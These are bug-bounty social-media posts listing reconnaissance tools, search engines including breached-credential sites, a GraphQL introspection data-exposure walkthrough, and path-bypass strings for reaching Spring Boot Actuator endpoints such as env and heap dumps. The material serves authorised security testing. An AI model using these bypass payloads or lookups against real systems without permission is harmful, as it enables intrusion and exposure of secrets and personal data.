MHD

🔥 Ultimate IDOR Testing Checklist 🔥 📌 https://t.co/NcOjwsBrre IDOR is still one of the most impactful bugs in bug bounty. Many critical findings start by simply changing an ID in a request. 💡 This checklist covers: ✔️ ID & UUID manipulation ✔️ API & version bypasses ✔️ Multi-account testing ✔️ GraphQL & WebSocket ✔️ Race conditions & batch abuse ✔️ Mobile, gRPC & blind IDOR If you want high-impact bugs, don’t skip this. 🚀 #bugbountytips #bugbounty #infosec #cybersec

If you use Nuclei for bug bounty or recon, this repo is a goldmine. Source: https://t.co/R1XkF0B6QV It aggregates hundreds of public/custom Nuclei template repos in one place: • CVEs • SSRF • SSTI • XSS • Takeovers • WAF detections • Fuzzing templates • API checks • and much more. A very useful resource for expanding your custom scanning workflow and discovering community templates you probably missed. 🔥 #bugbounty #cybersecurity #appsec #infosec #nuclei #hacking

Top 60 Hacker Search Engines 💀🔥 1.🌐Shodan 2.📡Censys 3.🔍Onyphe 4.👁️ZoomEye 5.⚙️GreyNoise 6.🛰️Natlas 7.🌍Netlas 8.🧭FOFA 9.📚NIST NVD 10.🧪https://t.co/MwlmYFSc4W 11.🔓opencve 12.🧠VulnIQ 13.📊Vulmon 14.🗂️VulDB 15.💥Sploitus 16.📰Oday .today 17.⚒️LOLBAS 18.🧰GTFOBins 19.🎯FullHunt 20.💻grep .app 21.🔎SearchCode 22.🤓NerdyData 23.📧https://t.co/Si2T81eO6n 24.🔗SynapsInt 25.☁️skymem 26.🧑ThatsThem 27.🌎Omnisint 28.🧩Riddler 29.🌐RobTex 30.🏗️BuiltWith 31.🔗URLScan 32.🌪️Chaos 33.📡DNSdb 34.📈DNSviz 35.🧾https://t.co/Bt1rfJIqPA 36.🔐crt .sh 37.📶Wigle 38.📍wifimap 39.📡wifispc 40.🌐mylnikov 41.🔑Dehashed 42.🗄️Snusbase 43.🔨HashKiller 44.🕶️AHMIA 45.🧅https://t.co/TQTLISud38 46.🌏Google 47.🇷🇺Yandex 48.🔎Bing 49.🎥Insecam 50.🧠ORKL 51.🧫tria .ge 52.💧leakix 53.📁filesec 54.⚠️malapi 55.📞TellowS 56.🔄https://t.co/M8hc0HJegq 57.☎️SpyDialer 58.💣ExploitDB 59.🚀Rapid7 DB 60.🖼️TinEye #OSINT #CyberSecurity #Recon #InfoSec

GraphQL Introspection Misconfiguration to Sensitive Data Exposure POC → 1. While testing a GraphQL endpoint, noticed introspection queries were enabled in production 2. Sent an introspection query to map the full schema 3. Discovered hidden queries related to internal user and admin data 4. Modified the query to fetch user email, roles, and internal metadata 5. Server returned sensitive data without proper authorization checks 6.This allowed attackers to enumerate users and access restricted information Learning → - GraphQL introspection should be disabled in production environments - Always enforce authorization on every resolver - Hidden schema endpoints often expose internal business logic #infosec #hacking #hacker #bugbounty #bugbountytips

Bug bounty tip 🔥 Most people stop at subdomain enum… real hunters go further ↓ Take your subs → generate permutations → resolve → profit 💰 Tools you should be using: • Altdns: https://t.co/1EAylLYiHd • dnsgen: https://t.co/TWTu9KkDYb • gotator: https://t.co/R4wIfcUAvp • shuffledns: https://t.co/0QB8BCS1qm Pro move 🧠 Use target-specific words (from JS, GitHub, Wayback) instead of generic lists → this is where hidden assets live Enumeration finds surface. Permutations find gold. 🔥 #BugBounty #BugBountyHunter #InfoSec #CyberSecurity #Recon

The Spring Boot Actuators can expose some sensitive informations like env vars, heap dumps, configs, and internal metrics And sometimes, with simple bypass tricks we can find them: actuator/env;.. ;/actuator/env actuator;/env actuator/env%00 actuator/env; ..;/actuator/env static../actuator/env actuator/health/..;/env #bugbounty #bugbountytips #cybersecurity